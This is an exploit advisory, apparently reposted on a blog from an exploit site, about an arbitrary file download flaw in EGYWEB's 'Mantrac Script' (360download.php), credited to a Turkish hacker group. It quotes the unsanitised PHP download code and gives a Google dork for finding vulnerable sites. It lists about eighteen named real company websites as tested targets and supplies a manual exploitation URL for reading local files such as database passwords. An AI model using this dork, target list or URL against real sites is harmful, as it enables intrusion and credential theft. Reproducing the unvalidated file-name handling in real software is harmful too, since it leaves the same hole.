~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact (onlymail) : knockout@e-mail.com.tr
[~] (.py) Exploit Coded by : B3mB4m
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
[~] Special Thankz: 1337day.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : EGYWEB
|~Affected Version : Mantrac Script
|~Software : www.egyweb.com
|~RISK : Medium
|~Google Keyword/Dork : "Created by EGYWEB" | "EGYWEB" inurl:index.php?pg= | inurl:360download.php
|~Tested On : [L] Kali Linux \ Mozilla Firefox \ Arora \ [R) ALL example sites.
####################INFO################################
database passwords can be drawn.
### Error Line in '360download.php' ##
..
..
$file_name=$_REQUEST['file_name'];
download($file_name);
?>
########################################################
Example and tested on;
http://www.deltagroup.com.eg
http://mantracvostok.ru
http://www.mantracghana.com
http://www.mantracnigeria.com
http://www.mantrackenya.com
http://www.mantractanzania.com
http://www.unatrac.com
http://www.iratrac.com
http://www.iratrac.iq
http://www.unatrac.com
http://www.mantracvostok.com
http://www.mantrac-sl.com
http://www.mantracuganda.com
http://www.mantracegypt.com
http://www.quest.com.eg
http://www.delta-ghana.com
http://www.delta-tanzania.com
http://www.pyramidscapital.com/eng/
############################################################
Manual Exploitation; http://$VICTIM/360download.php?filename=[LOCAL FILE]
############################################################
=========Automatic "db_connector.php" File Disclosure Exploit ========
Source : http://1337day.com/exploit/description/22643
Hiç yorum yok:
Yorum Gönder